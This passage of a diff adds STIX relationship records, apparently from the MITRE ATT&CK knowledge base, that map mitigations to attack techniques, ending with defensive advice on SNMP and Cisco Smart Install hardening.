"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--fbb82f95-94fd-4faf-a106-8c7a7191446e", + "type": "relationship", + "modified": "2020-10-24T04:20:18.874Z", + "created": "2020-10-20T03:37:05.106Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--e36e7b1a-aa7b-4354-92d4-4373b9911b51", + "type": "relationship", + "modified": "2020-10-24T04:20:44.055Z", + "created": "2020-10-20T03:37:41.019Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--40b6a660-4028-47cc-9f13-28adb5dba5b7", + "type": "relationship", + "modified": "2020-10-24T04:21:41.644Z", + "created": "2020-10-20T03:38:28.309Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--6417adf9-8767-4258-9d26-6e95a43bef47", + "type": "relationship", + "modified": "2020-10-24T04:22:11.376Z", + "created": "2020-10-20T03:39:09.084Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--fdde385f-3781-47fa-9cb7-ef7c5b903e63", + "type": "relationship", + "modified": "2020-10-24T04:22:46.327Z", + "created": "2020-10-20T03:39:41.638Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--4bb2d90a-468a-48af-8912-5386d2a1aa1d", + "type": "relationship", + "modified": "2020-10-24T04:23:37.378Z", + "created": "2020-10-20T03:40:27.820Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--aefa2807-65bf-4b81-b91b-d8ec2dfbd80b", + "type": "relationship", + "modified": "2020-10-22T17:57:29.263Z", + "created": "2020-10-20T15:42:48.288Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--833b16fc-34c1-4ad9-bbb4-a0054cdc7f10", + "type": "relationship", + "modified": "2020-10-20T19:47:46.971Z", + "created": "2020-10-20T15:42:48.320Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--132985bb-b5bd-4fce-b61d-ae3177de73f7", + "type": "relationship", + "modified": "2020-10-20T19:47:47.002Z", + "created": "2020-10-20T15:42:48.340Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", + "description": "Organizations may intentionally register similar domains to their own to deter adversaries from creating typosquatting domains. Other facets of this technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--c296b445-a4b5-4e73-91b0-0c6c9f3eed1b", + "type": "relationship", + "modified": "2020-10-20T20:25:29.498Z", + "created": "2020-10-20T15:42:48.349Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--1569b958-8b61-42bc-8171-91a068d7fe1a", + "type": "relationship", + "modified": "2020-10-20T19:47:47.035Z", + "created": "2020-10-20T15:42:48.371Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--c54b00ec-fdb7-483e-ad6e-be4fb1da0fd8", + "type": "relationship", + "modified": "2020-10-22T17:58:32.559Z", + "created": "2020-10-20T15:42:48.379Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--90a11110-2124-4d1f-92b7-1d5525e3ba8d", + "type": "relationship", + "modified": "2020-10-22T17:59:17.524Z", + "created": "2020-10-20T15:42:48.393Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--3b09f6eb-ff5a-4d95-ae24-d4f6934a8fc6", + "type": "relationship", + "modified": "2020-10-22T18:20:40.798Z", + "created": "2020-10-20T15:45:24.362Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--9e7ff28c-3c76-488d-8fb3-623a19ee55c1", + "type": "relationship", + "modified": "2020-10-20T19:50:14.554Z", + "created": "2020-10-20T15:45:24.386Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--5cf196e1-fccd-438c-b292-24a3607c1118", + "type": "relationship", + "modified": "2020-10-20T19:50:14.576Z", + "created": "2020-10-20T15:45:24.410Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--771bb993-77b0-4019-906e-b59011943740", + "type": "relationship", + "modified": "2020-10-20T19:50:14.594Z", + "created": "2020-10-20T15:45:24.442Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--4659b352-d455-43a6-981a-49c5858c7dcf", + "type": "relationship", + "modified": "2020-10-20T19:50:14.606Z", + "created": "2020-10-20T15:45:24.451Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--f5f4cd1c-b71b-4cdd-ab7c-77a5981bb56b", + "type": "relationship", + "modified": "2020-10-20T19:50:14.620Z", + "created": "2020-10-20T15:47:55.122Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--958d5dfd-89f6-4563-bfcd-1999e35d40be", + "type": "relationship", + "modified": "2020-10-22T18:03:23.859Z", + "created": "2020-10-20T15:47:55.146Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--bb0f5803-3c4c-46d4-a499-36baf1fb156c", + "type": "relationship", + "modified": "2020-10-20T19:50:14.652Z", + "created": "2020-10-20T15:47:55.169Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--242f96c4-460f-49e6-80a9-79ea85348c2d", + "type": "relationship", + "modified": "2020-10-20T19:50:14.674Z", + "created": "2020-10-20T15:47:55.188Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--19264fec-8c72-470f-9a7f-6c135718fde7", + "type": "relationship", + "modified": "2020-10-20T19:50:14.689Z", + "created": "2020-10-20T15:47:55.199Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--972c3c99-a172-4191-a35e-dedef750d36e", + "type": "relationship", + "modified": "2020-10-22T18:01:45.870Z", + "created": "2020-10-20T15:47:55.206Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--bd82a68a-af53-45c7-ac0e-d8cdac989080", + "type": "relationship", + "modified": "2020-10-22T18:02:30.375Z", + "created": "2020-10-20T15:47:55.222Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--17fde86e-66f2-4432-881c-b162c0501204", + "type": "relationship", + "modified": "2020-10-20T19:52:33.308Z", + "created": "2020-10-20T15:50:00.559Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--15cae685-cd89-4b79-b89b-e7153fb16ba2", + "type": "relationship", + "modified": "2020-10-20T19:52:33.335Z", + "created": "2020-10-20T15:50:00.591Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--5761f7ba-920b-491b-a010-d12645dedf0b", + "type": "relationship", + "modified": "2020-10-22T18:18:08.500Z", + "created": "2020-10-20T15:50:00.624Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--c5811e32-72d6-4ac8-8769-15772e7ac50f", + "type": "relationship", + "modified": "2020-10-20T19:52:33.369Z", + "created": "2020-10-20T15:50:00.644Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--6bf03275-b5bb-4c67-b3a6-5a4642d763e6", + "type": "relationship", + "modified": "2020-10-20T19:52:33.387Z", + "created": "2020-10-20T15:50:00.654Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--d40b183e-3714-4e2c-a738-caff2db7054a", + "type": "relationship", + "modified": "2020-10-20T19:52:33.409Z", + "created": "2020-10-20T15:52:49.893Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--35054627-12cd-4613-bbbd-0c5848fe06f8", + "type": "relationship", + "modified": "2020-10-22T18:22:21.071Z", + "created": "2020-10-20T15:52:49.919Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--0d600c05-c617-46f4-947f-cdd6ca56d494", + "type": "relationship", + "modified": "2020-10-22T18:18:55.085Z", + "created": "2020-10-20T15:52:49.945Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--c6d22962-0e39-4339-a574-81e4891694a2", + "type": "relationship", + "modified": "2020-10-20T19:52:33.478Z", + "created": "2020-10-20T15:52:49.975Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--e6767ba4-3cb7-4819-b8c8-d72dcab05858", + "type": "relationship", + "modified": "2020-10-20T19:52:33.495Z", + "created": "2020-10-20T15:52:49.977Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--20a02fc6-3cce-4ce6-bf76-2f82c2a88232", + "type": "relationship", + "modified": "2020-10-20T19:52:33.572Z", + "created": "2020-10-20T15:52:50.002Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "relationship_type": "mitigates", + "id": "relationship--0a328420-501e-4d8d-b2bd-9b3d4562e767", + "type": "relationship", + "modified": "2020-10-20T19:52:33.591Z", + "created": "2020-10-20T15:52:50.022Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c", + "target_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "relationship_type": "mitigates", + "description": "onfigure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources. Create signatures to detect Smart Install (SMI) usage from sources other than trusted director. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)", + "id": "relationship--9160a38d-799b-431d-a5d1-a9b4099ab8b1", + "external_references": [ + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:45:55.312Z", + "created": "2020-10-20T17:30:34.734Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "target_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "relationship_type": "mitigates", + "description": "Configure SNMPv3 to use the highest level of security (authPriv) available. (Citation: US-CERT TA17-156A SNMP Abuse 2017) ", + "id": "relationship--38762462-11f6-4f44-bda3-4da3c2c8d70d", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:45:55.305Z", + "created": "2020-10-20T17:30:34.849Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--e5d930e9-775a-40ad-9bdb-b941d8dfe86b", + "target_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "relationship_type": "mitigates", + "description": "Keep system images and software updated and migrate to SNMPv3. (Citation: Cisco Blog Legacy Device Attacks)", + "id": "relationship--ae8a7787-7915-4dfa-bf79-73fd76dc6473", + "external_references": [ + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:45:55.350Z", + "created": "2020-10-20T17:30:34.952Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "target_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "relationship_type": "mitigates", + "description": "Apply extended ACLs to block unauthorized protocols outside the trusted network. (Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "id": "relationship--940764df-0039-40fa-a3c7-ce064ceed4ea", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:45:55.362Z", + "created": "2020-10-20T17:30:35.053Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b5dbb4c5-b0b1-40b1-80b6-e9e84ab90067", + "target_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "relationship_type": "mitigates", + "description": "Allowlist MIB objects and implement SNMP views. Disable Smart Install (SMI) if not used. (Citation: Cisco Securing SNMP) (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) ", + "id": "relationship--91baa343-383f-4010-b799-67e42bd8a016", + "external_references": [ + { + 